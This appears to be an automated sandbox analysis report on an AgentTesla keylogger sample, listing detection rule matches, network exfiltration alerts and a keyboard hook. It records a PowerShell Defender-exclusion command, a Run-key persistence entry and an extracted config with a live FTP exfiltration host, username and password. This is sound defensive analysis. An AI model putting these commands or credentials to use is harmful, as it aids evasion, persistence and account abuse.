0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x72bfc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xafc1c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72c6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xafc8e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72cf8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xafd18:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72d8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xafdaa:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72df4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xafe14:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72e66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xafe86:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72efc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaff1c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x6fe0c:$s2: GetPrivateProfileString 0xace2c:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x6f492:$s3: get_OSFullName 0xac4b2:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x70b89:$s5: remove_Key 0x70d49:$s5: remove_Key 0xadba9:$s5: remove_Key 0xadd69:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x71cc1:$s6: FtpWebRequest 0xaece1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x72bde:$s7: logins
Click to see the 41 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhPWt112uC.exe", ParentImage: C:\Users\user\Desktop\dhPWt112uC.exe, ParentProcessId: 7404, ParentProcessName: dhPWt112uC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", ProcessId: 7612, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\newapp\newapp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\dhPWt112uC.exe, ProcessId: 7628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newapp

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhPWt112uC.exe", ParentImage: C:\Users\user\Desktop\dhPWt112uC.exe, ParentProcessId: 7404, ParentProcessName: dhPWt112uC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", ProcessId: 7612, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:34:18.247210+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49747	192.254.225.136	21	TCP
2025-01-11T08:34:25.740138+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49752	192.254.225.136	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:34:18.709427+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49748	192.254.225.136	49190	TCP
2025-01-11T08:34:18.715270+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49748	192.254.225.136	49190	TCP
2025-01-11T08:34:26.210410+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49753	192.254.225.136	45445	TCP
2025-01-11T08:34:26.217704+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49753	192.254.225.136	45445	TCP

Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:35:33.826452+0100	1800007	1	A Network Trojan was detected	192.168.2.4	54658	192.254.225.136	31555	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: dhPWt112uC.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

Avira: detection malicious, Label: HEUR/AGEN.1309499

Found malware configuration

Source: 7.2.newapp.exe.3b65260.5.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "ben@ercolina-usa.com", "Password": "nXe0M~WkW&nJ"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: dhPWt112uC.exe	Virustotal: Detection: 75%			Perma Link
Source: dhPWt112uC.exe	ReversingLabs: Detection: 75%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: dhPWt112uC.exe

Joe Sandbox ML: detected

Source: dhPWt112uC.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49751 version: TLS 1.2

Source: dhPWt112uC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: CFss.pdb source: dhPWt112uC.exe, newapp.exe.4.dr
Source:	Binary string: CFss.pdbSHA256Z#5 source: dhPWt112uC.exe, newapp.exe.4.dr

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4x nop then jmp 06ABD644h		0_2_06ABD82C
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 4x nop then jmp 0556D30Ch		7_2_0556D4F4

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49748 -> 192.254.225.136:49190
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49747 -> 192.254.225.136:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49753 -> 192.254.225.136:45445
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49752 -> 192.254.225.136:21
Source: Network traffic	Suricata IDS: 1800007 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs : 192.168.2.4:54658 -> 192.254.225.136:31555

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:54389 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 192.254.225.136 192.254.225.136
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown

FTP traffic detected: 192.254.225.136:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.ercolina-usa.com

Source: dhPWt112uC.exe, 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ercolina-usa.com
Source: dhPWt112uC.exe, 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.ercolina-usa.com
Source: dhPWt112uC.exe, 00000000.00000002.1778647173.0000000002793000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1948576547.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2021441042.0000000003266000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49751 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\dhPWt112uC.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\newapp\newapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\newapp\newapp.exe

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.3ba2480.3.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.3b65260.5.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.newapp.exe.4271d80.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.3ba2480.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.newapp.exe.3b65260.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_00B7D3A4	0_2_00B7D3A4
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BF6698	0_2_04BF6698
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BF6688	0_2_04BF6688
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BF0006	0_2_04BF0006
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BF0040	0_2_04BF0040
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BFEF38	0_2_04BFEF38
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_04BFEF33	0_2_04BFEF33
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_06ABA7A8	0_2_06ABA7A8
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_06ABA798	0_2_06ABA798
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_06AB8718	0_2_06AB8718
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_06ABB1A0	0_2_06ABB1A0
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_06ABB1B0	0_2_06ABB1B0
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_06AB8FA8	0_2_06AB8FA8
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_06AB8B70	0_2_06AB8B70
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 0_2_06ABF8D8	0_2_06ABF8D8
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_031AEB20	4_2_031AEB20
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_031A4A68	4_2_031A4A68
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_031A3E50	4_2_031A3E50
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_031A4198	4_2_031A4198
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_031A1980	4_2_031A1980
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_031AADB0	4_2_031AADB0
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F8697C	4_2_06F8697C
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F86E10	4_2_06F86E10
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F8696C	4_2_06F8696C
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F85D48	4_2_06F85D48
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F85D3A	4_2_06F85D3A
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F966D8	4_2_06F966D8
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F956A8	4_2_06F956A8
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F97E60	4_2_06F97E60
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F93568	4_2_06F93568
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F9B2FF	4_2_06F9B2FF
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Code function: 4_2_06F9C260	4_2_06F9C260
